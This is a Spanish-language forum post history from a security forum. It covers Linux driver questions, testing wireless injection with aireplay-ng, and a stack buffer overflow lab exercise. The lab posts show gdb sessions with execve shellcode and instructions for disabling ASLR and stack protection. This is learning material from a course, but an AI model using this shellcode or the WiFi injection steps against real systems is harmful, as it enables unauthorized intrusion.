últimos mensajes de: Belial & Grimoire

Mostrar Mensajes
Páginas: 1 ... 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 [35] 36 37 38 39 40 41 42 43 44 45 46 47 48 49

341	Programación / Scripting / Re: python consejo sobre RAD/IDE/GUI	en: 17 Febrero 2011, 03:49 am
pues yo me acomodo en gnome con gtk, en python se me hizo sencillo, aunque no he usado QT porque casi no me gusta KDE aunque se que no es necesario KDE para usar QT, pero bueno, es solo por preferencia salu2

342	Sistemas Operativos / GNU/Linux / Re: tengo 2 kernel diferentes, pero no se si sea posible usarlos sin modificar algo.	en: 17 Febrero 2011, 03:45 am
hola Citar No he entendido del todo lo que quieres decir pero...tu puedes tener 5, 10, 20 kernels instalados, eso da igual. Al instalar un nuevo controlador en el nuevo kernel, el otro dejará de funcionar en el viejo. (No se si me explico bian xD) sip, a eso me refiero... tengo 2 kernel diferentes, y tengo que usar para la tarjeta de video nvidia x86-195.36.24-pkg1.run pero para el nuevo kernel que instale tengo que usar el controlador x86-270.18.run... , y no se si es posible instalar los 2 y solo usar el que necesite.... encontre que podia hacer un backup de nvidia.ko pero cuando instalo los drivers me alerta que removera todo Citar Si te refieres a tener dos kernels instalados a la vez y poder arrancar desde cualquiera de ellos disponiendo del módulo de nvidia, simplemente haz un backup de ese módulo (nvidia.o, o nvidia.ko) antes de instalar el driver para el nuevo kernel. Una vez instalado restauras y listo. Citar Y buscaste soporte en el mismo kernel para tu ralink ? Si, pero creo a Debian squeeze aun no liberan el kernel con soporte para el ralink que tengo... intente recompilar el codigo pero en la zona de wireless no encuentro ralink, y en el nuevo kernel si lo encontre, y de hecho si funciona ralink pero no puedo hacer auditorias y en el kernel nuevo puedo hacer todo Citar Pues claro... cuando tienes un kernel y este es el que estas usando para iniciar tu sistema GNU/Linux, entonces todos los drivers que estes instalando o estes cargando, estaran siendo en una version especifica o aceptable para el kernel que estas cargando, ya que OJO, no para todo siempre tienes que bajar un drivers... o acaso no sabes que es un Kernel ? Si, pero tengo fallas al no instalar drivers o instalar lo que viene por default en debian con compiz, y he leido en google que mientras siga siendo propietario NVIDIA, hacerlo que funcione 100% bien.... aun no es totalmente posible aunque han logrado hacer que funcione bien ojala sea posible hacer un cambio de driver rapido, sino pues instalare los drivers cada que se necesite, de todas fomas no lo hare todo el tiempo, solo cuando vaya a utilizar ralink para auditorias o inyecciones salu2 salu2

343	Seguridad Informática / Wireless en Linux / Re: puedo hacer inyeccion con mi ralink si hice un test con aireplay-ng?	en: 17 Febrero 2011, 01:36 am
a ok, gracias... es que antes lo intente con un realtek y si me funciono... pero muy lento y a veces no lo hacia bien... y no encontre athero salu2

344	Sistemas Operativos / GNU/Linux / tengo 2 kernel diferentes, pero no se si sea posible usarlos sin modificar algo.	en: 16 Febrero 2011, 01:59 am
hola Estuve instalando un USB para red Ralink, pero para hacerlo tuve que instalar un kernel diferente, el que tenia era la version linux-image-2.6.32-5-686 pero para poder hacer funcionar la tarjeta y hacer auditorias tuve que instalar la version linux-image-2.6.38-rc1+ el problema esta en que para entrar en la version 2.6.38 tuve que instalar una version diferente del controlador de la que ya tenia instalada en mi tarjeta de video NVIDIA, tuve que instalar la version x86-270.18.run pero antes tenia x86-195.36.24-pkg1.run.... hay algun problema con los demas programas instalados en m computadora por ser un kernel diferente?...porque creo virtualbox si me parece con error. para no entrar en conflictos, es necesario desinstalar e instalar el driver de mi tarjeta dependiendo de la version del kernel que quiera usar? o hay alguna otra forma de tener acceso en los dos kernel sin reisntalar o quitar el controlador de video? salu2

345	Seguridad Informática / Wireless en Linux / puedo hacer inyeccion con mi ralink si hice un test con aireplay-ng?	en: 16 Febrero 2011, 01:43 am
hola una pregunta... ya logre hacer funcionar en debian squeeze mi USB ralink, estuve leyendo y leyendo en google y encontre que tenia que instalar kernel 2.6.38-rc1+, parchear wireless, quitar codigos y parchear aircrack, etc... y por fin lo logre ahorita logre descifrar mi clave wep, y con aireplay-ng --test mon0 ver si hacia inyecciones lo hice tanto en wifiway 2.0 como en debian y las respuestas son muuuy parecido, pero con pequeñas diferencias si lo intento varias veces, la parte de No Answer "creo" a veces me sale diferente, y en 29/30 %96 a veces me sale 100%... no se si eso sea malo? Citar 18:21:46 Trying broadcast probe requests... 18:21:48 No Answer... 18:21:48 Found 1 AP 18:21:48 Trying directed probe requests... 18:21:48 00:1E:C7:XXXXXXXX - channel: 11 - 'MAXX ' 18:21:49 Ping (min/avg/max): 1.662ms/27.221ms/38.121ms Power: -41.72 18:21:49 29/30: 96% 18:21:49 Injection is working! Pero eso quiere decir que mi ralink puede hacer auditorias con aircrack, wireshark e incluso inyecciones con ettercap? salu2

346	Seguridad Informática / Bugs y Exploits / Re: [Taller] Curso Exploiting elhacker.net 2011 : Grupo 1	en: 14 Febrero 2011, 01:10 am
pues tengo skype static, linux debian squeeze, y openssh-client es necesario tambien instalar un servidor ssh?.... sino para instalar ssh, porque solo tengo el cliente "openssh-client" una pregunta sobre la version de linux como mencione tengo debian y estuve haciendo un exploit que posteo Sagrini y por mas que lo intente, el exploit no me funciono, creen que para no meterme en problemas de que algo no me funcione, sea necesario instalar en virtualbox la misma version de ubuntu con la que ustedes hara esto? si creen que sea recomendable... que version de ubuntu tengo que descargar? salu2

347	Seguridad Informática / Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]	en: 11 Febrero 2011, 20:15 pm
no... mira, de forma sencilla Citar root@lainux:/home/the-gazette/Desktop/ex# echo 0 > /proc/sys/kernel/randomize_va_space root@lainux:/home/the-gazette/Desktop/ex# cat /proc/sys/kernel/randomize_va_space 0 root@lainux:/home/the-gazette/Desktop/ex# exit exit the-gazette@lainux:~/Desktop/ex$ gcc -o vuln vuln.c --no-stack-protector -g -z execstack the-gazette@lainux:~/Desktop/ex$ ./vuln $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x0c\xf4\xff\xbf"') the-gazette@lainux:~/Desktop/ex$ RET Citar (gdb) r AAAA Starting program: /home/the-gazette/Desktop/ex/vuln AAAA Breakpoint 1, vuln (buff=0xbffff682 "AAAA") at vuln.c:8 8 strcpy (buffer, buff); (gdb) x/x buffer 0xbffff40c: 0xb7e9ba75 (gdb) x/x buff 0xbffff682: 0x41414141 si pongo RET con 3 AAA Citar (gdb) x/x buffer 0xbffff40c: 0xb7e9ba75 (gdb) x/x buff 0xbffff682: 0x00414141 (gdb)

348

Seguridad Informática / Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]

en: 11 Febrero 2011, 19:23 pm

ya desactive randomize_va_space y si estoy utilizando ese mismo codigo, igualmente hice copy paste

para sobreescribir si son 44

44-4-4-25 = 11

al compilar tengo que agregar -g sino me aparece

Citar

(gdb) x/x buffer
No symbol table is loaded. Use the "file" command.
(gdb) q

para que sobreescriba todo tengo que usar 4 AAAA en vez de 3

Esto no entiendo... tiene que salirme

Código:

0xbffff904:    0x00000000 <----

en vez de esto... o no importa?

Código:

0xbffff40c:	0xb7e9ba75 <-----

Cambie ret

Código:

r $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x0c\xf4\xff\xbf"') <-----

paso a paso

Código:

(gdb) r $(perl -e 'print "\x90" x 15 . "B"x25 . "XXXX"')
Starting program: /home/the-gazette/Desktop/ex/vuln $(perl -e 'print "\x90" x 15 . "B"x25 . "XXXX"')

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) r $(perl -e 'print "\x90" x 15 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/the-gazette/Desktop/ex/vuln $(perl -e 'print "\x90" x 15 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) br vuln
Breakpoint 1 at 0x80483fa: file vuln.c, line 7.
(gdb) r AAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/the-gazette/Desktop/ex/vuln AAAA

Breakpoint 1, vuln (buff=0xbffff682 "AAAA") at vuln.c:7
7	    strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff40c:	0xb7e9ba75
(gdb) x/x buff
0xbffff682:	0x41414141

(gdb) r $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x0c\xf4\xff\xbf"')
Starting program: /home/the-gazette/Desktop/ex/vuln $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x0c\xf4\xff\xbf"')

Breakpoint 1, vuln (
    buff=0xbffff65e "\220\220\220\220\220\220\220\220\220\220\220\061\300Ph//shh/bin\211\343P\211\342S\211\341\260\v̀\f\364\377\277") at vuln.c:7
7	    strcpy (buffer, buff);
(gdb) c
Continuing.

Program exited with code 0334.

aumente en 12 solo por la curiosidad de las 4 AAAA y use 10 pero tampoco y use 0xbffff682 y tampoco

para encontrar ret

Código:

(gdb) r AAAA
Starting program: /home/the-gazette/Desktop/ex/vuln AAAA

Breakpoint 1, vuln (buff=0xbffff682 "AAAA") at vuln.c:8
8	    strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff40c:	0xb7e9ba75
(gdb) x/x buff
0xbffff682:	0x41414141

salu2

349	Seguridad Informática / Wireless en Linux / Re: ayuda puede explicar de como instalar los drivers para wifislax rtl 8185	en: 11 Febrero 2011, 00:43 am
yo encontre esto haber si te sirve http://foro.elhacker.net/wireless_en_linux/como_instalar_usb_encore_enuwig2_chipset_realtek_rtl8187b_en_wifislax_31-t206923.0.html

350	Seguridad Informática / Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]	en: 10 Febrero 2011, 08:27 am
hola Pues lo estuve intentando, tambien de esta manera, conte las veces de nop's que se necesitaban y no hubo ninguna shell ya tambien lo intente con perl, hice copy paste de los codigos y nada, compile las cosas como me dijeron y tampoco me di cuenta de algo... al revisarlo con GDB, me di cuenta que al poner "r AAA", cuando trate de sacar el RET, me di cuenta que buffer no queda asi Código: Breakpoint 1, vuln (buff=0xbffffb60 "AAA") at vuln.c:7 7 strcpy (buffer, buff); (gdb) x/x buffer [b]0xbffff904[/b]: 0x00000000 Me queda de esta manera Código: Breakpoint 1, vuln (buff=0xbffff682 "AAAA") at vuln.c:7 7 strcpy (buffer, buff); (gdb) x/x buffer 0xbffff40c: 0xb7e9ba75 (gdb) y si coloco x/x buff Código: (gdb) x/x buff 0xbffff682: 0x41414141 alli estan los 41, o por lo menos eso en Windows para mi era señal de vulnerabilidad intente con 0xbffff40c y 0xbffff682 y con ninguno de los 2, como mencione calcule too, y le iba aumentando poco a poco, pero en el comando "c" en gdb, solo me decia (gdb) c Continuing y le aumente hasta que llegue a 15 me salio Program received signal SIGSEGV, Segmentation fault. 0xbffff69c in ?? () no se si alli este el problema, aunque me imagino que sip uso debian 6.0 squeeze ------------------------------------- mr. blood perdon si no te he podido agregar, pero como veras en estos momentos no he podido entrar mucho al foro, pero en cuanto pueda te agrego y vemos eso. salu2

Páginas: 1 ... 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 [35] 36 37 38 39 40 41 42 43 44 45 46 47 48 49